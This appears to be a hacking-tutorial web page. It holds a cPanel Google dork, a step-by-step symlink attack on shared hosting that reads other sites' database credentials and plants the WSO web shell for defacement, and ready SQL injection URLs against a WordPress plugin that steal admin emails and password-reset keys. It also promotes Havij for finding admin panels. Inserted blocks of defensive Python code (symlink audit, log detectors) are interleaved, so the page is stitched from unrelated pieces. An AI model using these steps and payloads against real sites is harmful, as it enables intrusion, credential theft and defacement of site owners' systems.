This is a dork-based trick with which we can get into the demo cPanels of many web hosting websites such as HostGator, HostMonster, etc.
It is just a simple method, but cool! :D Go to http://www.google.com and enter this dork: inurl:2082/login/?user= You will get lots of results. Click on one and bingo, you are in the demo cPanel!
Symlink stands for symbolic link, also called a soft link. The best way to describe it for everyone out there is that it is like a shortcut in Windows. To explain in a bit more detail: imagine you are on your desktop and you create a shortcut to "C:/". This is essentially like creating a symlink from "/home/userx/www/" to "/". Please note that a shortcut is not the same as a symlink, and Windows also supports symlinking. I only use shortcuts as a reference because they are similar and help explain it for those who may not understand otherwise.
I am making this tutorial for those who have shelled websites and can't root the server, as not all Linux boxes can be rooted and we don't have exploits for all Linux kernels.
So here I am going to show you how to hack websites on a server using symlink. First you will need a shelled website on that server; only then can you do symlink. Without a shell you can't do symlink.
1.) Here is my shelled website.
2.) Here I am not going to tell you to create two folders and then do the symlink. I will use an automated symlink script, which you can download from here and upload to the shelled website.
This is how it will look. Now click on symlink bypass.
If it is able to read /etc/passwd, then you can do symlink on the server, but it is not always 100% sure that the server can be symlinked just because it can read /etc/passwd. Nowadays HostGator, HostMonster, Bluehost, etc. servers are patched against symlink, but others are still vulnerable.
3.) Our next step is to find the available WordPress and Joomla websites on the same server, so now we will click on this.
4.) For this tut I will be hacking a Joomla site, so it will look like this. All the domains under the domain column are Joomla websites on the server. As you can see, I have my target Joomla website. Now I will click on config, and then I will be redirected to the symlink shortcut link of the directories of the target website :D. The config file contains the username and password of that website's database.
5.) Now copy the username and password from the config page.
6.) In this step you have to upload a database file to your shelled website. Download the database file from the download link, upload it to the website, and then access it. It will look like this. Now enter the username and password which you just copied from the config page above and log in.
7.) After login you will see this page. Now you are in the database of your target website, bingo :P
8.) Click on tables, and then in tables you have to find the user, admin table, as you can see here.
9.) Now click on data. You will see the admin users' data, like id, username, password, emails, etc. Now click on edit.
10.) Now you will see the username and password hash. Here you can do two things: the best one is to replace the password hash with your own, or you can try to decrypt that hash. I got the decrypted hash on Google, so now I know the admin username and password of the website. It's time to log in.
11.) Now go to the target website's login page. The default admin login page for Joomla is www.site.com/administrator
12.) Bingo, now we have hacked a website on that server. Now it's time to upload a shell and deface. This is how we upload a shell in Joomla: go to > tools > template manager > click on any template > edit html. Now you will see the HTML code of the template to edit.
13.) Now paste your shell's source code here. I will use the 404.php WSO pv8 shell, which is available for you in the download file.
After pasting the code, click on save.
Now go to the shell directory www.site.com/templates/name_template/index.php. Here is our shell.
14.) Now I will enter my password in the shell and log in to the shell. Bingo, website pwned, and now you can deface it.
This is how you will hack all the websites on the same server using symlink. Websites which you can hack: Joomla, WordPress (wp-config).
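For a hosting admin, the whole technique above depends on a symlink inside one account's web root resolving to another account's files or to "/". The following is an added example, not part of the original tutorial: an audit that lists such links. The account names, directory layout and file contents are constructed for the demo.

```python
import os
import tempfile

# File names the page names as symlink targets: Joomla and WordPress configs, /etc/passwd.
SENSITIVE_NAMES = {"configuration.php", "wp-config.php", "passwd"}

def audit_symlinks(docroot, account_home):
    """List symlinks under docroot whose real target lies outside account_home."""
    home = os.path.realpath(account_home)
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if target == home or target.startswith(home + os.sep):
                continue  # stays inside the owning account: not a cross-account link
            findings.append({
                "link": os.path.relpath(path, docroot),
                "target": target,
                "sensitive": os.path.basename(target) in SENSITIVE_NAMES,
                "points_at_root": target == os.sep,
            })
    return sorted(findings, key=lambda f: f["link"])

def build_demo_tree(base):
    """Constructed sample: two hosting accounts (userx, usery) under a fake /home."""
    other_site = os.path.join(base, "home", "usery", "public_html")
    home = os.path.join(base, "home", "userx")
    docroot = os.path.join(home, "www")
    os.makedirs(other_site)
    os.makedirs(os.path.join(docroot, "sym"))
    for path in (os.path.join(other_site, "configuration.php"),
                 os.path.join(docroot, "index.php")):
        with open(path, "w") as fh:
            fh.write("<?php // constructed placeholder\n")
    os.symlink(os.path.join(other_site, "configuration.php"),
               os.path.join(docroot, "sym", "usery.txt"))      # cross-account config
    os.symlink(os.sep, os.path.join(docroot, "sym", "root"))    # link to "/"
    os.symlink(os.path.join(docroot, "index.php"),
               os.path.join(docroot, "ok.php"))                 # benign, same account
    return docroot, home

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        for finding in audit_symlinks(*build_demo_tree(base)):
            print(finding)
```

A finding with `sensitive` set means another site's database credentials may have been read through the link, so those credentials should be rotated as part of the cleanup.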
As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.
So let's begin. I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page. We enter this in Google:
Now we need the admin username and email. We need to inject:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email. Go to the login page of the site. It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now you enter either the username or the email. We can enter either one, so it doesn't matter. I entered the email.
When you get:
"Check your e-mail for the confirmation link."
it means that the reset key was successfully sent. Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
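From the defender's side, the two injections above and the password reset between them leave a recognisable sequence in the web server's access log. The following is an added example, not code from the original post: it flags non-integer `videoid` values and reports clients that inject, request a reset, then read `user_activation_key`. The log lines are constructed, and it assumes the same client IP is used for all three requests.

```python
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SQL_RE = re.compile(r"union\s+select|group_concat|wp_users|user_activation_key", re.I)

def parse(line):
    """Return (ip, method, path, query dict) for a combined-format log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    url = urlsplit(target)
    return ip, method, url.path, parse_qs(url.query, keep_blank_values=True)

def injected_tokens(query, param="videoid"):
    """SQL tokens found in a parameter that should only ever hold an integer."""
    found = set()
    for value in query.get(param, []):
        if not re.fullmatch(r"\d+", value):
            found.add("non_integer")
            found.update(re.sub(r"\s+", " ", t.lower()) for t in SQL_RE.findall(value))
    return found

def reset_key_theft(lines):
    """IPs that injected, then requested a password reset, then read user_activation_key."""
    # Assumption: the reset form is submitted as POST wp-login.php?action=lostpassword.
    stage, alerts = {}, []   # stage per ip: 1 = injected, 2 = reset requested, 3 = alerted
    for ip, method, path, query in filter(None, map(parse, lines)):
        tokens = injected_tokens(query)
        if "user_activation_key" in tokens and stage.get(ip) == 2:
            alerts.append(ip)
            stage[ip] = 3
        elif tokens and ip not in stage:
            stage[ip] = 1
        elif (method == "POST" and path.endswith("/wp-login.php")
              and query.get("action") == ["lostpassword"] and stage.get(ip) == 1):
            stage[ip] = 2
    return alerts

# Constructed sample log lines (documentation IP ranges, made-up timestamp).
_P = "/wp-content/plugins/hd-webplayer/playlist.php?videoid="
_INJ = ("-3%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,{col},0x3b),"
        "5,6,7,8,9,10,11%20FROM%20wp_users--")
def _line(ip, method, target, status=200):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "{method} {target} HTTP/1.1" {status} 512'
SAMPLE_LOG = [
    _line("198.51.100.7", "GET", _P + "12"),
    _line("203.0.113.9", "GET", _P + _INJ.format(col="user_email")),
    _line("203.0.113.9", "POST", "/wp-login.php?action=lostpassword", 302),
    _line("203.0.113.9", "GET", _P + _INJ.format(col="user_activation_key")),
]
```

The underlying fix belongs in the plugin: `videoid` should be cast to an integer or bound as a query parameter before it reaches SQL.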
Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and execute commands on the operating system.
What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.
What's New?
Multithreading
Oracle Blind injection method.
Automatic all parameter scan added.
New blind injection method (no more ? char.)
Retry for blind injection.
A new method for tables/columns extraction in mssql blind.
A WAF bypass method for mysql blind.
Getting tables and columns even when it cannot get the current database.
Auto save log.
bugfix: url encode bug fixed.
bugfix: trying time based methods when mssql error based and union based fail.
bugfix: clicking get columns would delete all tables.
bugfix: resetting time based method delay when applying settings.
The admin panel is the place where the admin of the site logs in and manages the site or the data present on the site. If you get access to the admin panel, then you are able to deface or compromise any data of the particular site you have logged in to. But nowadays finding the admin panel is difficult. People use online admin finders or Havij to find admin panels.
So today I will tell you how to find admin panels easily with the latest list of admin panels. I found this way on my own, but only the way, not the list. I will use Havij for my trick. Normally Havij has a list of 300-500 admin panels, but my latest list has around 1000+.
So, let's begin:
First of all, download Havij and the latest admin finder list.
After getting the list and Havij, install Havij and open its directory, which is C:\Program Files\Havij.
There you will see the admins.txt document. Note: you can't edit the admins.txt in that folder.
Create a new file named admins.txt and save it on the desktop. Remember, the admins.txt that you create should contain the list of admin panels that I gave you at the start.
Delete or cut the admins.txt from the Havij folder and paste in your admins.txt.
Now open Havij, click on Find Admin, and start finding admin panels with the 1000+ list of admin panel links.
So by this trick we can find the admin panel easily, because at the start we had only 500, but now we have a 1000+ list in Havij.
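A wordlist run like the Find Admin scan described above shows up in the target's access log as one client collecting 404s on many different paths in a short time. The following is an added example, not part of the original post: a sliding-window detector for that pattern. The log lines, placeholder paths, window and threshold are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

def find_path_enumeration(lines, window=timedelta(seconds=60), threshold=20):
    """Return {ip: peak number of distinct 404 paths seen inside one window}."""
    recent = defaultdict(deque)   # ip -> (time, path) of its recent 404 responses
    peaks = {}
    for line in lines:            # each client's lines must be in time order
        m = LOG_RE.match(line)
        if not m or m.group(4) != "404":
            continue
        ip, ts, target, _status = m.groups()
        when = datetime.strptime(ts, TS_FORMAT)
        path = target.split("?", 1)[0].lower()
        hits = recent[ip]
        hits.append((when, path))
        while when - hits[0][0] > window:
            hits.popleft()        # drop 404s that fell out of the window
        distinct = len({p for _, p in hits})
        if distinct >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), distinct)
    return peaks

def build_sample_log():
    """Constructed log: one client guessing 30 placeholder paths, one normal visitor."""
    start = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)
    def line(ip, offset, path, status):
        ts = (start + timedelta(seconds=offset)).strftime(TS_FORMAT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512'
    log = [line("198.51.100.7", 0, "/index.php", 200),
           line("198.51.100.7", 5, "/favicon.ico", 404)]
    log += [line("203.0.113.50", i, f"/guess-{i:04d}/login.php", 404) for i in range(30)]
    log.append(line("203.0.113.50", 31, "/administrator/", 200))
    return log

if __name__ == "__main__":
    print(find_path_enumeration(build_sample_log()))
```

A 200 or 302 from the same client right after such a burst is the request worth looking at first, since it marks the path the scan actually found.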
THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM